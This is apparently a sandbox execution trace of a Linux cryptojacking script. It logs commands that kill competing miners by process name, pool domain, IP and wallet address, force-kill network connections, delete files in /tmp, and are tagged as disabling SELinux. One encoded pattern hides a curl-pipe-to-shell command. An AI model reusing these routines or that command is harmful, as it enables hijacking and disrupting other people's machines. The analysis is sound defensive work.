- /bin/grep
  grep curl
  2⤵
  PID:1451
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1452
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1453
- /bin/grep
  grep -v grep
  2⤵
  PID:1449
- /bin/ps
  ps aux
  2⤵
  PID:1448
- /bin/grep
  grep j2.conf
  2⤵
  PID:1456
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1457
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1458
- /bin/grep
  grep -v grep
  2⤵
  PID:1455
- /bin/ps
  ps aux
  2⤵
  PID:1454
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1461
- /bin/grep
  grep -v grep
  2⤵
  PID:1460
- /bin/grep
  grep wget
  2⤵
  PID:1462
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1463
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1464
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1459
- /bin/grep
  grep curl
  2⤵
  PID:1468
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1469
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1470
- /bin/grep
  grep -v grep
  2⤵
  PID:1466
- /bin/ps
  ps aux
  2⤵
  PID:1465
- /bin/grep
  grep ficov
  2⤵
  PID:1473
- /bin/grep
  grep wget
  2⤵
  PID:1474
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1475
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1476
- /bin/grep
  grep -v grep
  2⤵
  PID:1472
- /bin/ps
  ps aux
  2⤵
  PID:1471
- /bin/grep
  grep curl
  2⤵
  PID:1480
- /bin/grep
  grep ficov
  2⤵
  PID:1479
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1482
- /bin/grep
  grep -v grep
  2⤵
  PID:1478
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1477
- /bin/grep
  grep wget
  2⤵
  PID:1486
- /bin/grep
  grep he.sh
  2⤵
  PID:1485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1487
- /bin/grep
  grep -v grep
  2⤵
  PID:1484
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1488
- /bin/ps
  ps aux
  2⤵
  PID:1483
- /bin/grep
  grep curl
  2⤵
  PID:1492
- /bin/grep
  grep he.sh
  2⤵
  PID:1491
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1493
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1494
- /bin/grep
  grep -v grep
  2⤵
  PID:1490
- /bin/ps
  ps aux
  2⤵
  PID:1489
- /bin/grep
  grep wget
  2⤵
  PID:1498
- /bin/grep
  grep miner.sh
  2⤵
  PID:1497
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1499
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1500
- /bin/grep
  grep -v grep
  2⤵
  PID:1496
- /bin/ps
  ps aux
  2⤵
  PID:1495
- /bin/grep
  grep miner.sh
  2⤵
  PID:1503
- /bin/grep
  grep -v grep
  2⤵
  PID:1502
- /bin/ps
  ps aux
  2⤵
  PID:1501
- /bin/grep
  grep curl
  2⤵
  PID:1504
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1505
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1506
- /bin/grep
  grep wget
  2⤵
  PID:1510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1511
- /bin/grep
  grep nullcrew
  2⤵
  PID:1509
- /bin/grep
  grep -v grep
  2⤵
  PID:1508
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1512
- /bin/ps
  ps aux
  2⤵
  PID:1507
- /bin/grep
  grep curl
  2⤵
  PID:1516
- /bin/grep
  grep nullcrew
  2⤵
  PID:1515
- /bin/grep
  grep -v grep
  2⤵
  PID:1514
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1517
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1513
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1518
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1522
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1523
- /bin/grep
  grep -v grep
  2⤵
  PID:1520
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1519
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1528
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1527
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1526
- /bin/grep
  grep -v grep
  2⤵
  PID:1525
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1524
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1531
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1532
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1533
- /bin/grep
  grep -v grep
  2⤵
  PID:1530
- /bin/ps
  ps aux
  2⤵
  PID:1529
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1537
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1538
- /bin/grep
  grep -v grep
  2⤵
  PID:1535
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1534
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1541
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1542
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1543
- /bin/grep
  grep -v grep
  2⤵
  PID:1540
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1539
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1547
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1546
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1548
- /bin/grep
  grep -v grep
  2⤵
  PID:1545
- /bin/ps
  ps aux
  2⤵
  PID:1544
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1552
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1553
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1551
- /bin/grep
  grep -v grep
  2⤵
  PID:1550
- /bin/ps
  ps auxf
  2⤵
  PID:1549
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1556
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1557
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1558
- /bin/grep
  grep -v grep
  2⤵
  PID:1555
- /bin/ps
  ps auxf
  2⤵
  PID:1554
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1561
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1562
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1563
- /bin/grep
  grep -v grep
  2⤵
  PID:1560
- /bin/ps
  ps auxf
  2⤵
  PID:1559
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1567
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1566
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1568
- /bin/grep
  grep -v grep
  2⤵
  PID:1565
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1564
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1572
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1573
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  - Disables SELinux
  PID:1571
- /bin/grep
  grep -v grep
  2⤵
  PID:1570
- /bin/ps
  ps auxf
  2⤵
  PID:1569
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1577
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1576
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1578
- /bin/grep
  grep -v grep
  2⤵
  PID:1575
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1574
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1582
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1583
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1581
- /bin/grep
  grep -v grep
  2⤵
  PID:1580
- /bin/ps
  ps auxf
  2⤵
  PID:1579
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1588
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1587
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1586
- /bin/grep
  grep -v grep
  2⤵
  PID:1585
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1584
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1592
- - /usr/local/sbin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- - /usr/local/bin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- - /usr/sbin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- - /usr/bin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- - /sbin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- - /bin/kill
    kill -9 1590
    3⤵
    - Disables SELinux
    PID:1593
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1591
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1590
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1589
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1596
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1595
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1597
- - /usr/local/sbin/kill
    kill -9 1595
    3⤵
    PID:1598
- - /usr/local/bin/kill
    kill -9 1595
    3⤵
    PID:1598
- - /usr/sbin/kill
    kill -9 1595
    3⤵
    PID:1598
- - /usr/bin/kill
    kill -9 1595
    3⤵
    PID:1598
- - /sbin/kill
    kill -9 1595
    3⤵
    PID:1598
- - /bin/kill
    kill -9 1595
    3⤵
    PID:1598
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1594
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1602
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1601
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1600
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1603
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1604
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1608
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1607
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1609
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1610
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1606
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1612
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1611
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1614
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  - Reads CPU attributes
  PID:1613
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1616
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:1615
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1618
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  - Reads CPU attributes
  PID:1617
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1620
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  - Reads CPU attributes
  PID:1619
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1622
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:1621
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1624
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  - Reads CPU attributes
  PID:1623
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1626
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1625
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1628
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  PID:1627
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1630
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  - Reads runtime system information
  PID:1629
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1632
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  - Reads CPU attributes
  PID:1631
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1634
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:1633
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1636
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  PID:1635
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  - Reads runtime system information
  PID:1637
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1638
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1640
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  - Reads CPU attributes
  PID:1639
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1642
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1641
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1644
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:1643
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1646
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  - Reads CPU attributes
  PID:1645
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1648
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:1647
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1650
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  PID:1649
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1652
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  PID:1651
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1654
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  PID:1653
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1656
- /usr/bin/pgrep
  pgrep -f ./vpp
  2⤵
  PID:1655
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1658
- /usr/bin/pgrep
  pgrep -f ./pces
  2⤵
  PID:1657
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1660
- /usr/bin/pgrep
  pgrep -f ./rspce
  2⤵
  PID:1659
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1662
- /usr/bin/pgrep
  pgrep -f ./haveged
  2⤵
  - Reads CPU attributes
  PID:1661
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1664
- /usr/bin/pgrep
  pgrep -f ./jiba
  2⤵
  PID:1663
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1666
- /usr/bin/pgrep
  pgrep -f ./watchbog
  2⤵
  PID:1665
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1668
- /usr/bin/pgrep
  pgrep -f ./A7mA5gb
  2⤵
  PID:1667
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1670
- /usr/bin/pgrep
  pgrep -f kacpi_svc
  2⤵
  - Reads CPU attributes
  PID:1669
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1672
- /usr/bin/pgrep
  pgrep -f kswap_svc
  2⤵
  - Reads runtime system information
  PID:1671
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1674
- /usr/bin/pgrep
  pgrep -f kauditd_svc
  2⤵
  - Reads runtime system information
  PID:1673
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1676
- /usr/bin/pgrep
  pgrep -f kpsmoused_svc
  2⤵
  - Reads runtime system information
  PID:1675
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1678
- /usr/bin/pgrep
  pgrep -f kseriod_svc
  2⤵
  PID:1677
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1680
- /usr/bin/pgrep
  pgrep -f kthreadd_svc
  2⤵
  - Reads runtime system information
  PID:1679
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1682
- /usr/bin/pgrep
  pgrep -f ksoftirqd_svc
  2⤵
  PID:1681
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1684
- /usr/bin/pgrep
  pgrep -f kintegrityd_svc
  2⤵
  - Reads runtime system information
  PID:1683
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1686
- /usr/bin/pgrep
  pgrep -f jawa
  2⤵
  PID:1685
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1688
- /usr/bin/pgrep
  pgrep -f oracle.jpg
  2⤵
  PID:1687
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1690
- /usr/bin/pgrep
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
  2⤵
  PID:1689
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1692
- /usr/bin/pgrep
  pgrep -f 188.209.49.54
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1691
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1694
- /usr/bin/pgrep
  pgrep -f 181.214.87.241
  2⤵
  - Reads runtime system information
  PID:1693
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1696
- /usr/bin/pgrep
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
  2⤵
  PID:1695
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1698
- /usr/bin/pgrep
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
  2⤵
  PID:1697
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1700
- /usr/bin/pgrep
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
  2⤵
  PID:1699
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1702
- /usr/bin/pgrep
  pgrep -f servim
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1701
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1704
- /usr/bin/pgrep
  pgrep -f kblockd_svc
  2⤵
  - Reads CPU attributes
  PID:1703
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1706
- /usr/bin/pgrep
  pgrep -f native_svc
  2⤵
  PID:1705
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1708
- /usr/bin/pgrep
  pgrep -f ynn
  2⤵
  - Reads CPU attributes
  PID:1707
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1710
- /usr/bin/pgrep
  pgrep -f 65ccEJ7
  2⤵
  PID:1709
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1712
- /usr/bin/pgrep
  pgrep -f jmxx
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1711
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1714
- /usr/bin/pgrep
  pgrep -f 2Ne80nA
  2⤵
  - Reads CPU attributes
  PID:1713
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1716
- /usr/bin/pgrep
  pgrep -f sysstats
  2⤵
  - Reads CPU attributes
  PID:1715
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1718
- /usr/bin/pgrep
  pgrep -f systemxlv
  2⤵
  PID:1717
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1720
- /usr/bin/pgrep
  pgrep -f watchbog
  2⤵
  PID:1719
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1722
- /usr/bin/pgrep
  pgrep -f OIcJi1m
  2⤵
  PID:1721
- /usr/bin/pkill
  pkill -f biosetjenkins
  2⤵
  PID:1723
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:1724
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  PID:1725
- /usr/bin/pkill
  pkill -f mixnerdx
  2⤵
  PID:1726
- /usr/bin/pkill
  pkill -f performedl
  2⤵
  PID:1727
- /usr/bin/pkill
  pkill -f JnKihGjn
  2⤵
  PID:1728
- /usr/bin/pkill
  pkill -f irqba2anc1
  2⤵
  - Reads CPU attributes
  PID:1729
- /usr/bin/pkill
  pkill -f irqba5xnc1
  2⤵
  PID:1730
- /usr/bin/pkill
  pkill -f irqbnc1
  2⤵
  PID:1731
- /usr/bin/pkill
  pkill -f ir29xc1
  2⤵
  - Reads CPU attributes
  PID:1732
- /usr/bin/pkill
  pkill -f conns
  2⤵
  - Reads CPU attributes
  PID:1733
- /usr/bin/pkill
  pkill -f irqbalance
  2⤵
  PID:1734
- /usr/bin/pkill
  pkill -f XJnRj
  2⤵
  PID:1735
- /usr/bin/pkill
  pkill -f mgwsl
  2⤵
  PID:1736
- /usr/bin/pkill
  pkill -f pythno
  2⤵
  - Reads runtime system information
  PID:1737
- /usr/bin/pkill
  pkill -f jweri
  2⤵
  - Reads CPU attributes
  PID:1738
- /usr/bin/pkill
  pkill -f lx26
  2⤵
  - Reads CPU attributes
  PID:1739
- /usr/bin/pkill
  pkill -f NXLAi
  2⤵
  - Reads runtime system information
  PID:1740
- /usr/bin/pkill
  pkill -f BI5zj
  2⤵
  - Reads CPU attributes
  PID:1741
- /usr/bin/pkill
  pkill -f askdljlqw
  2⤵
  PID:1742
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1743
- /usr/bin/pkill
  pkill -f minergate
  2⤵
  - Reads CPU attributes
  PID:1744
- /usr/bin/pkill
  pkill -f Guard.sh
  2⤵
  PID:1745
- /usr/bin/pkill
  pkill -f ysaydh
  2⤵
  - Reads CPU attributes
  PID:1746
- /usr/bin/pkill
  pkill -f bonns
  2⤵
  PID:1747
- /usr/bin/pkill
  pkill -f donns
  2⤵
  PID:1748
- /usr/bin/pkill
  pkill -f kxjd
  2⤵
  PID:1749
- /usr/bin/pkill
  pkill -f Duck.sh
  2⤵
  PID:1750
- /usr/bin/pkill
  pkill -f bonn.sh
  2⤵
  PID:1751
- /usr/bin/pkill
  pkill -f conn.sh
  2⤵
  PID:1752
- /usr/bin/pkill
  pkill -f kworker34
  2⤵
  PID:1753
- /usr/bin/pkill
  pkill -f kw.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1754
- /usr/bin/pkill
  pkill -f pro.sh
  2⤵
  PID:1755
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  PID:1756
- /usr/bin/pkill
  pkill -f acpid
  2⤵
  PID:1757
- /usr/bin/pkill
  pkill -f icb5o
  2⤵
  PID:1758
- /usr/bin/pkill
  pkill -f nopxi
  2⤵
  PID:1759
- /usr/bin/pkill
  pkill -f irqbalanc1
  2⤵
  - Reads runtime system information
  PID:1760
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1761
- /usr/bin/pkill
  pkill -f i586
  2⤵
  PID:1762
- /usr/bin/pkill
  pkill -f gddr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1763
- /usr/bin/pkill
  pkill -f mstxmr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1764
- /usr/bin/pkill
  pkill -f ddg.2011
  2⤵
  PID:1765
- /usr/bin/pkill
  pkill -f wnTKYg
  2⤵
  PID:1766
- /usr/bin/pkill
  pkill -f deamon
  2⤵
  - Reads CPU attributes
  PID:1767
- /usr/bin/pkill
  pkill -f disk_genius
  2⤵
  PID:1768
- /usr/bin/pkill
  pkill -f sourplum
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1769
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  PID:1770
- /usr/bin/pkill
  pkill -f nanoWatch
  2⤵
  PID:1771
- /usr/bin/pkill
  pkill -f zigw
  2⤵
  PID:1772
- /usr/bin/pkill
  pkill -f devtool
  2⤵
  PID:1773
- /usr/bin/pkill
  pkill -f devtools
  2⤵
  - Reads runtime system information
  PID:1774
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  - Reads runtime system information
  PID:1775
- /usr/bin/pkill
  pkill -f watchbog
  2⤵
  PID:1776
- /usr/bin/pkill
  pkill -f sustes
  2⤵
  PID:1777
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  - Reads CPU attributes
  PID:1778
- /usr/bin/pkill
  pkill -f xmrig-cpu
  2⤵
  PID:1779
- /usr/bin/pkill
  pkill -f 121.42.151.137
  2⤵
  - Reads runtime system information
  PID:1780
- /usr/bin/pkill
  pkill -f init12.cfg
  2⤵
  PID:1781
- /usr/bin/pkill
  pkill -f nginxk
  2⤵
  PID:1782
- /usr/bin/pkill
  pkill -f tmp/wc.conf
  2⤵
  - Reads CPU attributes
  PID:1783
- /usr/bin/pkill
  pkill -f xmrig-notls
  2⤵
  PID:1784
- /usr/bin/pkill
  pkill -f xmr-stak
  2⤵
  - Reads runtime system information
  PID:1785
- /usr/bin/pkill
  pkill -f suppoie
  2⤵
  PID:1786
- /usr/bin/pkill
  pkill -f zer0day.ru
  2⤵
  PID:1787
- /usr/bin/pkill
  pkill -f dbus-daemon--system
  2⤵
  - Reads runtime system information
  PID:1788
- /usr/bin/pkill
  pkill -f nullcrew
  2⤵
  PID:1789
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:1790
- /usr/bin/pkill
  pkill -f kworkerds
  2⤵
  - Reads runtime system information
  PID:1791
- /usr/bin/pkill
  pkill -f init10.cfg
  2⤵
  - Reads CPU attributes
  PID:1792
- /usr/bin/pkill
  pkill -f /wl.conf
  2⤵
  PID:1793
- /usr/bin/pkill
  pkill -f crond64
  2⤵
  PID:1794
- /usr/bin/pkill
  pkill -f sustse
  2⤵
  PID:1795
- /usr/bin/pkill
  pkill -f vmlinuz
  2⤵
  PID:1796
- /usr/bin/pkill
  pkill -f exin
  2⤵
  - Reads CPU attributes
  PID:1797
- /usr/bin/pkill
  pkill -f apachiii
  2⤵
  PID:1798
- /usr/bin/pkill
  pkill -f svcworkmanager
  2⤵
  PID:1799
- /usr/bin/pkill
  pkill -f xr
  2⤵
  PID:1800
- /usr/bin/pkill
  pkill -f trace
  2⤵
  PID:1801
- /usr/bin/pkill
  pkill -f svcupdate
  2⤵
  PID:1802
- /usr/bin/pkill
  pkill -f networkmanager
  2⤵
  PID:1803
- /usr/bin/pkill
  pkill -f phpupdate
  2⤵
  PID:1804
- /bin/rm
  rm -rf /usr/bin/config.json
  2⤵
  PID:1805
- /bin/rm
  rm -rf /usr/bin/exin
  2⤵
  PID:1806
- /bin/rm
  rm -rf /tmp/wc.conf
  2⤵
  PID:1807
- /bin/rm
  rm -rf /tmp/log_rot
  2⤵
  PID:1808
- /bin/rm
  rm -rf /tmp/apachiii
  2⤵
  PID:1809
- /bin/rm
  rm -rf /tmp/sustse
  2⤵
  PID:1810
- /bin/rm
  rm -rf /tmp/php
  2⤵
  PID:1811
